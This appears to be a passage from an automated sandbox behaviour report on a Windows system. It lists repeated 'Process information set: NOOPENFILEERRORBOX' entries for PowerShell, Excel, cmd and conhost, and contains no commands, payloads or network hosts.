Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
